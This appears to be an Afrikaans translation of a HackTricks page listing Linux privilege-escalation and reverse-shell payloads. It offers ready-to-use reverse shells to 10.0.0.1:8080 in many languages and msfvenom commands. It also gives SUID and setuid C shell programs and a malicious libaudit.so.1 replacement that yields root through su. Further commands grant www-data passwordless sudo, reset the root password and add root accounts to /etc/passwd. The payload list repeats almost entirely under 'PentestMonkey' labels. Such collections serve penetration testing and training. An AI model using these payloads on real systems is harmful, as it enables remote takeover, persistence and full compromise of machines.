Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert) !
Werk jy in 'n cybersecurity-maatskappy ? Wil jy jou maatskappy adverteer in HackTricks ? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af ? Kyk na die SUBSCRIPTION PLANS !
Bash
Copy cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
Uitvoeringsladinge
Hier is 'n lys van nuttige uitvoeringsladinge wat gebruik kan word vir voorregverhoging in Linux-stelsels:
Bash
Copy bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Perl
Copy perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
Copy python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
Copy php - r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
Copy ruby - rsocket - e 'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
Copy nc -e /bin/sh 10.0 .0.1 8080
Socat
Copy socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane
Java
Copy r = Runtime . getRuntime ()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p . waitFor ()
xterm
Copy xterm -display 10.0 .0.1:1
PowerShell
Copy powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Metasploit
Copy msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f elf > shell.elf
Socat (Metasploit)
Copy msfvenom -p cmd/unix/reverse_socat LHOST= 10.0 .0.1 LPORT= 8080 -f elf > shell.elf
Python (Metasploit)
Copy msfvenom -p cmd/unix/reverse_python LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.py
PHP (Metasploit)
Copy msfvenom -p php/meterpreter_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.php
Ruby (Metasploit)
Copy msfvenom -p cmd/unix/reverse_ruby LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.rb
Netcat (Metasploit)
Copy msfvenom -p cmd/unix/reverse_netcat LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.sh
Java (Metasploit)
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.jsp
War (Metasploit)
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f war > shell.war
Python (PentestMonkey)
Copy python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP (PentestMonkey)
Copy php - r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby (PentestMonkey)
Copy ruby - rsocket - e 'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat (PentestMonkey)
Copy nc -e /bin/sh 10.0 .0.1 8080
Socat (PentestMonkey)
Copy socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane
Java (PentestMonkey)
Copy r = Runtime . getRuntime ()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p . waitFor ()
xterm (PentestMonkey)
Copy xterm -display 10.0 .0.1:1
PowerShell (PentestMonkey)
Copy powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Metasploit (PentestMonkey)
Copy msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f elf > shell.elf
Socat (Metasploit) (PentestMonkey)
Copy msfvenom -p cmd/unix/reverse_socat LHOST= 10.0 .0.1 LPORT= 8080 -f elf > shell.elf
Python (Metasploit) (PentestMonkey)
Copy msfvenom -p cmd/unix/reverse_python LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.py
PHP (Metasploit) (PentestMonkey)
Copy msfvenom -p php/meterpreter_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.php
Ruby (Metasploit) (PentestMonkey)
Copy msfvenom -p cmd/unix/reverse_ruby LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.rb
Netcat (Metasploit) (PentestMonkey)
Copy msfvenom -p cmd/unix/reverse_netcat LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.sh
Java (Metasploit) (PentestMonkey)
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f raw > shell.jsp
War (Metasploit) (PentestMonkey)
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.0 .0.1 LPORT= 8080 -f war > shell.war
Copy //gcc payload.c -o payload
int main ( void ){
setresuid( 0 , 0 , 0 ) ; //Set as user suid user
system( "/bin/sh" ) ;
return 0 ;
}
Copy //gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main (){
setuid(getuid()) ;
system( "/bin/bash" ) ;
return 0 ;
}
Copy // Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main ( void ) {
char *const paramList[ 10 ] = { "/bin/bash" , "-p" , NULL };
const int id = 1000 ;
setresuid(id , id , id) ;
execve(paramList[ 0 ] , paramList , NULL ) ;
return 0 ;
}
Oorskryf 'n lêer om voorregte te verhoog
Gewone lêers
Voeg 'n gebruiker met 'n wagwoord by in /etc/passwd
Verander die wagwoord binne /etc/shadow
Voeg 'n gebruiker by in sudoers in /etc/sudoers
Misbruik docker deur die docker-socket, gewoonlik in /run/docker.sock of /var/run/docker.sock
Oorskryf 'n biblioteek
Kyk na 'n biblioteek wat deur 'n sekere binêre lêer gebruik word, in hierdie geval /bin/su
:
Copy ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 = > /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 = > /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 = > /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 = > /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
In hierdie geval gaan ons probeer om /lib/x86_64-linux-gnu/libaudit.so.1
na te boots.
Dus, kyk vir funksies van hierdie biblioteek wat deur die su
binêre lêer gebruik word:
Copy objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_open
0000000000000000 DF *UND* 0000000000000000 audit_log_user_message
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
Die simbole audit_open
, audit_log_acct_message
, audit_log_acct_message
en audit_fd
is waarskynlik afkomstig van die libaudit.so.1-biblioteek. Aangesien die libaudit.so.1 oorskryf sal word deur die skadelike gedeelde biblioteek, moet hierdie simbole teenwoordig wees in die nuwe gedeelde biblioteek, anders sal die program nie in staat wees om die simbool te vind en sal dit afsluit.
Copy #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;
void inject () __attribute__ ((constructor));
void inject ()
{
setuid( 0 ) ;
setgid( 0 ) ;
system( "/bin/bash" ) ;
}
Nou, deur eenvoudig /bin/su
te roep, sal jy 'n skul as root verkry.
Skripte
Kan jy maak dat root iets uitvoer?
www-data na sudoers
Copy echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Verander root wagwoord
Copy echo "root:hacked" | chpasswd
Voeg 'n nuwe root-gebruiker by in /etc/passwd
Copy echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd
Copy echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert) !
Werk jy in 'n cybersecurity-maatskappy ? Wil jy jou maatskappy geadverteer sien in HackTricks ? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af ? Kyk na die SUBSCRIPTION PLANS !
Last updated 2 months ago